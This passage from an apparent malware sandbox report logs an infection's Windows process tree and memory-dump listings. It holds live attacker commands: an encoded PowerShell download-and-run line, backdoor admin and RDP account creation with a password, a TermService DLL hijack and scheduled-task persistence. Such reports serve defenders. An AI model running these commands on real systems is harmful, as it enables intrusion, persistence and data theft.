                                                                        "C:\Users\Admin\AppData\Local\Temp\is-QJNBF.tmp\Thu16f3de88a335950bb.tmp" /SL5="$50118,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f3de88a335950bb.exe" /SILENT
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:648
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0U5L9.tmp\postback.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0U5L9.tmp\postback.exe" ss1
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:1136
                                                                        • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                          "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          PID:3704
                                                                        • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                          "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:4432
                                                                          • C:\80214e32f700082784\Setup.exe
                                                                            C:\80214e32f700082784\\Setup.exe /q /norestart /x86 /x64 /web
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:4152
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
                                                                4⤵
                                                                  PID:1168
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0CC1A2F5\Thu16f584bd3686.exe
                                                                    Thu16f584bd3686.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:3160
                                                          • C:\Windows\system32\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                            1⤵
                                                            • Process spawned unexpected child process
                                                            PID:4680
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                              2⤵
                                                              • Loads dropped DLL
                                                              PID:960
                                                          • \??\c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                            1⤵
                                                              PID:2464
                                                            • \??\c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                              1⤵
                                                                PID:4760
                                                              • C:\Users\Admin\AppData\Local\Temp\D32A.exe
                                                                C:\Users\Admin\AppData\Local\Temp\D32A.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4612
                                                                • C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4436
                                                                  • C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:1508
                                                                  • C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:980
                                                                  • C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks processor information in registry
                                                                    PID:2104
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im CCccleaner.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe" & del C:\ProgramData\*.dll & exit
                                                                      4⤵
                                                                        PID:2204
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /im CCccleaner.exe /f
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:4452
                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                          timeout /t 6
                                                                          5⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:4616
                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
                                                                  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
                                                                  1⤵
                                                                  • Modifies registry class
                                                                  PID:1640
                                                                • C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:3636
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                    2⤵
                                                                    • Deletes itself
                                                                    • Drops file in Windows directory
                                                                    PID:2552
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dhvs4mev\dhvs4mev.cmdline"
                                                                      3⤵
                                                                        PID:396
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AD0.tmp" "c:\Users\Admin\AppData\Local\Temp\dhvs4mev\CSC285652151773445CB197BB70F9D44E24.TMP"
                                                                          4⤵
                                                                            PID:660
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                          3⤵
                                                                            PID:420
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                            3⤵
                                                                              PID:4524
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                              3⤵
                                                                                PID:1368
                                                                              • C:\Windows\system32\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                3⤵
                                                                                  PID:5100
                                                                                • C:\Windows\system32\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                  3⤵
                                                                                  • Modifies registry key
                                                                                  PID:4292
                                                                                • C:\Windows\system32\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                  3⤵
                                                                                    PID:4604
                                                                                  • C:\Windows\system32\net.exe
                                                                                    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                    3⤵
                                                                                      PID:4220
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                        4⤵
                                                                                          PID:2724
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                        3⤵
                                                                                          PID:3812
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            cmd /c net start rdpdr
                                                                                            4⤵
                                                                                              PID:4832
                                                                                              • C:\Windows\system32\net.exe
                                                                                                net start rdpdr
                                                                                                5⤵
                                                                                                  PID:4296
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 start rdpdr
                                                                                                    6⤵
                                                                                                      PID:3896
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                3⤵
                                                                                                  PID:1508
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    cmd /c net start TermService
                                                                                                    4⤵
                                                                                                      PID:4624
                                                                                                      • C:\Windows\system32\net.exe
                                                                                                        net start TermService
                                                                                                        5⤵
                                                                                                          PID:4676
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 start TermService
                                                                                                            6⤵
                                                                                                              PID:1840
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                                                                        3⤵
                                                                                                          PID:4420
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                                                                          3⤵
                                                                                                            PID:4676
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3ADF.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3ADF.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Accesses Microsoft Outlook accounts
                                                                                                        • Accesses Microsoft Outlook profiles
                                                                                                        • outlook_office_path
                                                                                                        • outlook_win_path
                                                                                                        PID:4636
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3ADF.exe"
                                                                                                          2⤵
                                                                                                            PID:5116
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /T 10 /NOBREAK
                                                                                                              3⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:4196
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\OIry9In8Rl.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\OIry9In8Rl.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4944
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                              3⤵
                                                                                                                PID:4524
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                                  4⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:3768
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            cmd /C net.exe user WgaUtilAcc 000000 /del
                                                                                                            1⤵
                                                                                                              PID:1724
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                net.exe user WgaUtilAcc 000000 /del
                                                                                                                2⤵
                                                                                                                  PID:4660
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                                                                                                    3⤵
                                                                                                                      PID:1808
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  cmd /C net.exe user WgaUtilAcc eAd4m54G /add
                                                                                                                  1⤵
                                                                                                                    PID:3576
                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                      net.exe user WgaUtilAcc eAd4m54G /add
                                                                                                                      2⤵
                                                                                                                        PID:1208
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 user WgaUtilAcc eAd4m54G /add
                                                                                                                          3⤵
                                                                                                                            PID:2248
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                        1⤵
                                                                                                                          PID:2452
                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                            net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                            2⤵
                                                                                                                              PID:2176
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                                                                3⤵
                                                                                                                                  PID:5016
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                                              1⤵
                                                                                                                                PID:4696
                                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                                  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                                                  2⤵
                                                                                                                                    PID:5052
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                                                                                                                                      3⤵
                                                                                                                                        PID:1396
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                    1⤵
                                                                                                                                      PID:3152
                                                                                                                                      • C:\Windows\system32\net.exe
                                                                                                                                        net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                        2⤵
                                                                                                                                          PID:1264
                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                            C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                                                                            3⤵
                                                                                                                                              PID:4708
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          cmd /C net.exe user WgaUtilAcc eAd4m54G
                                                                                                                                          1⤵
                                                                                                                                            PID:2316
                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                              net.exe user WgaUtilAcc eAd4m54G
                                                                                                                                              2⤵
                                                                                                                                                PID:4452
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 user WgaUtilAcc eAd4m54G
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4948
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                cmd.exe /C wmic path win32_VideoController get name
                                                                                                                                                1⤵
                                                                                                                                                  PID:1460
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2800
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    cmd.exe /C wmic CPU get NAME
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3904
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic CPU get NAME
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4480
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4640
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4088
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                                                                                3⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:4032
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:4852
                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            PID:4240
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:644
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:1008
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:5116
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:4572
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:4880

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • memory/348-633-0x000001CCD3C70000-0x000001CCD3CE2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/396-341-0x00000000051D0000-0x00000000057D6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.0MB

                                                                                                                                                          • memory/396-300-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/620-237-0x0000000004A90000-0x0000000004B66000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            856KB

                                                                                                                                                          • memory/620-252-0x0000000000400000-0x0000000002E08000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            42.0MB

                                                                                                                                                          • memory/620-199-0x0000000002F48000-0x0000000002FC5000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            500KB

                                                                                                                                                          • memory/648-227-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/696-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                          • memory/696-143-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                          • memory/696-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            572KB

                                                                                                                                                          • memory/696-135-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            572KB

                                                                                                                                                          • memory/696-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            572KB

                                                                                                                                                          • memory/696-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                          • memory/696-144-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                          • memory/696-141-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                          • memory/696-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                          • memory/696-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.5MB

                                                                                                                                                          • memory/696-140-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            152KB

                                                                                                                                                          • memory/696-142-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            100KB

                                                                                                                                                          • memory/888-241-0x0000000006A00000-0x0000000006A01000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-232-0x0000000006C70000-0x0000000006C71000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-212-0x0000000007050000-0x0000000007051000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-399-0x0000000006A13000-0x0000000006A14000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-209-0x0000000000D70000-0x0000000000D71000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-217-0x0000000006A10000-0x0000000006A11000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-391-0x000000007F3A0000-0x000000007F3A1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-248-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-205-0x0000000000750000-0x0000000000751000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-288-0x0000000007F30000-0x0000000007F31000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-234-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-213-0x0000000006A12000-0x0000000006A13000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-281-0x0000000006FB0000-0x0000000006FB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-238-0x0000000007680000-0x0000000007681000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-235-0x0000000006F20000-0x0000000006F21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-226-0x0000000006CB0000-0x0000000006CB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/888-207-0x0000000000750000-0x0000000000751000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/924-681-0x0000020D72370000-0x0000020D723E2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/960-637-0x0000000004700000-0x000000000475D000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            372KB

                                                                                                                                                          • memory/960-634-0x00000000047D3000-0x00000000048D4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                          • memory/1100-677-0x00000217FDA20000-0x00000217FDA92000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/1248-708-0x00000200EE6A0000-0x00000200EE712000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/1332-706-0x0000019EE5A10000-0x0000019EE5A82000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/1476-684-0x000001E939070000-0x000001E9390E2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/1652-233-0x0000000000B80000-0x0000000000B81000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1652-211-0x000000001B130000-0x000000001B132000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/1652-192-0x00000000003F0000-0x00000000003F1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1652-200-0x0000000000820000-0x0000000000821000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1808-282-0x0000000077080000-0x000000007720E000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            1.6MB

                                                                                                                                                          • memory/1808-301-0x0000000005DB0000-0x0000000005DB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1808-292-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1808-340-0x0000000005790000-0x0000000005791000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1920-679-0x0000026A84380000-0x0000026A843F2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            456KB

                                                                                                                                                          • memory/1956-253-0x0000000003210000-0x0000000003211000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1956-259-0x000000000AD20000-0x000000000AD21000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1956-263-0x000000000B080000-0x000000000B081000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

